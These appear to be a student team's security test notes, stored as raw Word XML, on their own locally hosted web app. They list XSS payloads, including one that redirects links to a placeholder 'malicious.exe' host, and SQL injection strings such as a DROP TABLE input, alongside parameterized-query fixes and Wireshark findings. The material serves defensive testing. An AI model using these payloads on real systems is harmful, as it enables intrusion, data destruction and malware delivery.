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3F36" w14:textId="780B9366" w:rsidR="005C724D" w:rsidRDefault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Garrett Reeve </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F229581" w14:textId="3D181827" w:rsidR="00535A19" w:rsidRDefault="00535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5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deangelo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aguilar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF062D" w14:textId="2414AF45" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535A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 iteration 3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894A170" w14:textId="09022872" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535A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66053" w14:textId="52C05ED2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XSS to test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D765779" w14:textId="5FAF8981" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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"&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00535A19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535A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/script&gt;"@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66117FED" w14:textId="4EEEDE29" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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35A1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35A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='mailto:USER_EMAIL'&gt;email me&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD98AC" w14:textId="1E68EB89" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foo'onclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535A1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35A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alert'foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670EB841" w14:textId="77777777" w:rsidR="00535A19" w:rsidRPr="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535A19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00535A19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r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/index.php?user=&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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window.onload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> = function() {var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AllLinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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document.getElementsByTagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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("a");</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AllLinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> = "http://badexample.com/malicious.exe";}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A20BC30" w14:textId="014D0BAD" w:rsidR="00535A19" w:rsidRDefault="005F15A4" w:rsidP="00535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hidden pages at the time of this build, no need to worry about accessing unwanted pages. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591E471C" w14:textId="796471E1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</w:p>
    <w:p w14:paraId="1D71BA01" w14:textId="2EF9762E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</w:p>
    <w:p w14:paraId="333796EE" w14:textId="50B43039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prevent XSS on email field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAD72C" w14:textId="2A5414EA" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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only entries that include @ and .com or .gov or .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76B32BD9" w14:textId="0A910351" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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allow any special characters </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838E834" w14:textId="36E39638" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535A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above rely on special characters like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&gt;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- + etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406A807" w14:textId="60637625" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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4834E4B" w14:textId="10EAEC92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</w:p>
    <w:p w14:paraId="1F826426" w14:textId="50523984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 tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924F488" w14:textId="61BAFB66" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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input fields that talk to database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B6A52" w14:textId="6F8DDF2C" w:rsidR="00535A19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105 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B78FF3" w14:textId="64B86FBD" w:rsidR="00535A19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" or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A383D9" w14:textId="508CB199" w:rsidR="00535A19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105; DROP TABLE Suppliers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40862714" w14:textId="020C4377" w:rsidR="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535A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one must be tested on a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enviorment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prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B84E627" w14:textId="21C97F8E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 against SQL injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F2C4C" w14:textId="2C5F406A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Need to use params that limit visibility and depth by attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36E0B2" w14:textId="338DD0F4" w:rsidR="00535A19" w:rsidRPr="00535A19" w:rsidRDefault="00535A19" w:rsidP="00535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some examples of using params </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F91A29" w14:textId="2438D5B7" w:rsidR="00535A19" w:rsidRPr="00535A19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txtUserId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getRequestString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("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");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"SELECT * FROM Users WHERE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@0";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db.Execute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txtSQL,txtUserId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36B920A" w14:textId="381D974F" w:rsidR="00535A19" w:rsidRPr="00697ECB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txtNam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getRequestString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("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");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getRequestString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("Address");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txtCit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getRequestString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("City");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"INSERT INTO Customers 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CustomerName,Address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,City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Values(@0,@1,@2)";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db.Execute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txtSQL,txtNam,txtAdd,txtCit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2427E6D" w14:textId="29356DB2" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BE0030" w14:textId="7119DF97" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A39FDE" w14:textId="5A105884" w:rsidR="00697ECB" w:rsidRPr="004E743E" w:rsidRDefault="00697ECB" w:rsidP="00697E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43E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tests on 11/11/21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402097E2" w14:textId="3D6F85AE" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393235C0" w14:textId="4845CD29" w:rsidR="00697ECB" w:rsidRPr="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697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the login page with the following commands run in the email space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D0963A" w14:textId="77777777" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB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"&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00535A19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535A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/script&gt;"@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FFBA6" w14:textId="77777777" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB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35A1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35A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='mailto:USER_EMAIL'&gt;email me&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B75A2A" w14:textId="77777777" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB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35A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foo'onclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535A1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35A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alert'foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CC6BB" w14:textId="3EA820CE" w:rsidR="00697ECB" w:rsidRPr="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697ECB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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">All above tests failed as we have added filtering for email field and not allowed certain special characters </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B97A58" w14:textId="2BA4EB7D" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00490C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ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username/email entries with the following tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543580FE" w14:textId="67AB60AA" w:rsidR="00697ECB" w:rsidRDefault="00697ECB" w:rsidP="00697EC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ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1' or '1' = '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A85697" w14:textId="2FF54B57" w:rsidR="00697ECB" w:rsidRDefault="00670942" w:rsidP="00697EC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942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAE0AB" w14:textId="21F9C375" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="006709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942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC2CC2" w14:textId="4D6C64C6" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="006709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942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1' or '1' = '1'))/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262EF0C" w14:textId="763D3C30" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="006709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942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00670942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D35962" w14:textId="36212150" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="0067094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Username/email entry tests see to be strong </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007B7BB" w14:textId="5871D271" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="006709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using an existing username or username that fits params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A319DC" w14:textId="67E1D7BE" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="006709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get passwords to display or to grab any info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E7E32" w14:textId="36945B8F" w:rsidR="00670942" w:rsidRPr="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="0067094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F15A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="718277FB" w14:textId="41AD3A44" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="00670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of account creation page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159E7104" w14:textId="4416F995" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="005440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ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1' or '1' = '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A625967" w14:textId="74894421" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="005440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0942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51079542" w14:textId="11BF2F35" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="005440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SELECT statements were tested to try and display table info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9475F" w14:textId="09A7D2E7" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="005440BA">
      <w:p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grab through SQL injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFD6E7" w14:textId="7D56227E" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="00544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see packets through Wireshark, Username is sent in plain text when account is created. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7643D7" w14:textId="5FFDEE61" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="00544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issue if malicious hackers wanted to grab usernames by sniffing the IP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAEE990" w14:textId="6F7BA34D" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="005440BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CFC186" w14:textId="52EE50B6" w:rsidR="005F15A4" w:rsidRPr="005440BA" w:rsidRDefault="005F15A4" w:rsidP="00544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Able to ping page multiple times without being blocked or timed out. DDOS is possible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA11008" w14:textId="2A0CB20A" w:rsidR="005440BA" w:rsidRDefault="005440BA" w:rsidP="00670942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352FA4C6" w14:textId="7FD10456" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="00670942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A0513B" w14:textId="4717CE17" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="00670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not tested if hashing works when being sent, hashing is stored sent but not sure if hashed before transmitting. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A1395" w14:textId="78B8CD2B" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="00670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plain text was seen when doing testing and using sniffer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3E86C" w14:textId="6E82C61D" w:rsidR="00670942" w:rsidRDefault="00670942" w:rsidP="00670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Wire shark was used to sniff packets locally on test environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F739C7" w14:textId="0C7048DC" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="00670942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA7D0ED" w14:textId="2306E5FF" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="00670942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB22F91" w14:textId="17CB8B89" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="00670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361326FD" w14:textId="411E5C72" w:rsidR="005F15A4" w:rsidRDefault="005F15A4" w:rsidP="00670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needs to be addressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD606C" w14:textId="3567EBCC" w:rsidR="005F15A4" w:rsidRDefault="004A01E7" w:rsidP="005F15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Sniffed packets do include lots of data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDB7D7" w14:textId="35C821D6" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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 following of which pages send to which</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6DEFD" w14:textId="0B17B379" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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be able to intercept packets and change data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274CE01B" w14:textId="0C9E671D" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01E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Actually, this is theoretically possible, not sure if the intercepted packets can be used to retrieve data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2807B1F0" w14:textId="77777777" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01E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packet intercept possible to take down server that holds database with large quires that loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00252D53" w14:textId="77777777" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A0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01E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">No password recovery system in place </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41136859" w14:textId="77777777" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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01E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This will bring issues such as spam from calling email links </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D2123" w14:textId="77777777" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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01E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">May be able to intercept packet as new password is being sent to server and then changing data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662402C0" w14:textId="63F0D736" w:rsidR="004A01E7" w:rsidRPr="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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01E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is all theoretical as no actual server is set up and is all local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27488B" w14:textId="6E3D7EBC" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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injections on login page seem to be safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0BD900" w14:textId="2F5919D6" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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field is very well filtered </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C65DD" w14:textId="7527B03F" w:rsidR="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01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field seems less safe as it allows for special characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A2688" w14:textId="7029E8E8" w:rsidR="004A01E7" w:rsidRPr="004A01E7" w:rsidRDefault="004A01E7" w:rsidP="004A01E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fix for this as long as the email is processed first and then just check for match without possibility of running script in password field </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004A01E7" w:rsidRPr="004A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39E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB58D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F53B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC88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21F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2C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A62AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E4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19"/>
    <w:rsid w:val="002964CB"/>
    <w:rsid w:val="004A01E7"/>
    <w:rsid w:val="004E743E"/>
    <w:rsid w:val="00535A19"/>
    <w:rsid w:val="005440BA"/>
    <w:rsid w:val="005B5BAE"/>
    <w:rsid w:val="005F15A4"/>
    <w:rsid w:val="00670942"/>
    <w:rsid w:val="00697ECB"/>
    <w:rsid w:val="00B2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52CC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61C22DF6-988E-4E05-97D2-65811DE7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A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A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5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Reeve</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Garrett Reeve</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-08T21:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-11T22:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>